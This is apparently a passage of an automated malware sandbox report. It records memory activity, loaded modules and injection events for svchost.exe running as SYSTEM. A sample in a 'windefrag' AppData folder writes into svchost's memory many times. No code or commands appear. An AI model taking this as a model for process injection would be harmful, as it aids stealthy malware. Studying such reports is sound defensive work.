| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a170, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 13 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
|
For performance reasons, the remaining 724 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Process #38: svchost.exe
1345
11
| Information | Value |
|---|---|
| ID | #38 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:01, Reason: Child Process |
| Unmonitor | End Time: 00:04:37, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:36 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9b4 |
| Parent PID | 0x534 (c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
97C
0x
140
0x
8B4
0x
558
0x
870
0x
41C
0x
5E8
0x
974
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rwx |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rwx |
|
|
|
- |
| imm32.dll | 0x000f0000 | 0x00118fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00130fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | r |
|
|
|
- |
| tzres.dll | 0x00150000 | 0x00150fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | rw |
|
|
|
- |
| msxml3r.dll | 0x00150000 | 0x00150fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x001f0000 | 0x0026cfff | Memory Mapped File | r |
|
|
|
- |
| rsaenh.dll | 0x001f0000 | 0x00234fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0020ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x0043ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x006e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x00870fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00c72fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c80000 | 0x00c80000 | 0x00d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d90000 | 0x00d90000 | 0x00e0ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00e10000 | 0x010defff | Memory Mapped File | r |
|
|
|
- |
| kernelbase.dll.mui | 0x010e0000 | 0x0119ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000011a0000 | 0x011a0000 | 0x012affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012b0000 | 0x012b0000 | 0x013bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001420000 | 0x01420000 | 0x0151ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001540000 | 0x01540000 | 0x0163ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001690000 | 0x01690000 | 0x0170ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001710000 | 0x01710000 | 0x0181ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001820000 | 0x01820000 | 0x019cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001820000 | 0x01820000 | 0x0194ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001820000 | 0x01820000 | 0x0189ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000018d0000 | 0x018d0000 | 0x0194ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001950000 | 0x01950000 | 0x019cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000019d0000 | 0x019d0000 | 0x01c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000019d0000 | 0x019d0000 | 0x01b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000019d0000 | 0x019d0000 | 0x01acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b00000 | 0x01b00000 | 0x01b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b90000 | 0x01b90000 | 0x01c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c10000 | 0x01c10000 | 0x01e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c10000 | 0x01c10000 | 0x01d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e00000 | 0x01e00000 | 0x01e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e80000 | 0x01e80000 | 0x0227ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002280000 | 0x02280000 | 0x02a80fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x03290fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003300000 | 0x03300000 | 0x033fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003400000 | 0x03400000 | 0x035fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037a0000 | 0x037a0000 | 0x0389ffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fffe000 | 0x7fffe000 | 0x7fffefff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0xffc20000 | 0xffc2afff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000140000000 | 0x140000000 | 0x140038fff | Private Memory | rwx |
|
|
|
- |
| msxml3.dll | 0x7fee2ed0000 | 0x7fee30a3fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x7fef7190000 | 0x7fef71f3fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7fef7200000 | 0x7fef7270fff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x7fef7de0000 | 0x7fef7dfafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptnet.dll | 0x7fef9310000 | 0x7fef9335fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7fef9660000 | 0x7fef9677fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7fef96b0000 | 0x7fef9702fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7fefb670000 | 0x7fefb67afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7fefb680000 | 0x7fefb6a6fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x7fefb8f0000 | 0x7fefba16fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x7fefbc10000 | 0x7fefbc17fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x7fefce20000 | 0x7fefce26fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7fefcf10000 | 0x7fefcf2afff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| devrtl.dll | 0x7fefcf50000 | 0x7fefcf61fff | Memory Mapped File | rwx |
|
|
|
- |
| credssp.dll | 0x7fefd080000 | 0x7fefd089fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7fefd0c0000 | 0x7fefd10bfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x7fefd210000 | 0x7fefd266fff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7fefd2a0000 | 0x7fefd2fafff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x7fefd410000 | 0x7fefd416fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7fefd420000 | 0x7fefd474fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7fefd5f0000 | 0x7fefd611fff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x7fefd620000 | 0x7fefd66dfff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7fefda20000 | 0x7fefda2afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7fefdc30000 | 0x7fefdc3efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7fefddf0000 | 0x7fefdf56fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7fefee30000 | 0x7fefee7cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7feffec0000 | 0x7feffec7fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x50000, size = 544 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x60000, size = 72 |
|
125 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0xffc2246c, size = 22 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x140000000, size = 1024 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x140001000, size = 166400 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a000, size = 35328 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x140033000, size = 3488 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x140033000, size = 1024 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x140034000, size = 8704 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x140037000, size = 2048 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x140038000, size = 1536 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 21 |
|
9 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20000, size = 16 |
|
118 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0xe0000, size = 48 |
|
124 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a2e8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 12 |
|
9 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a2f0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 6 |
|
5 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a2f8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 7 |
|
9 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a300, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 5 |
|
4 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a308, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 8 |
|
5 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a310, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 10 |
|
5 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a318, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 11 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a320, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 13 |
|
9 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a328, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a330, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 15 |
|
11 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a338, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 17 |
|
9 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a340, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 9 |
|
3 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a348, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a350, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a358, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 18 |
|
3 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a360, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a368, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a370, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a378, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a380, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a388, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a390, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 19 |
|
8 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a398, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 22 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a3a0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a3a8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a3b0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a3b8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a3c0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a3c8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a3d0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a3d8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a3e0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a3e8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a3f0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a3f8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 14 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a400, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a408, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a410, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a418, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a420, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 25 |
|
4 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a078, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 24 |
|
2 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a080, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x20010, size = 20 |
|
5 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a088, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a090, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a098, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a0a0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a0a8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a0b0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a0b8, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a0c0, size = 8 |
|
1 | |
| Modify Memory | #37: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x67c | address = 0x14002a0c8, size = 8 |
|
1 | |
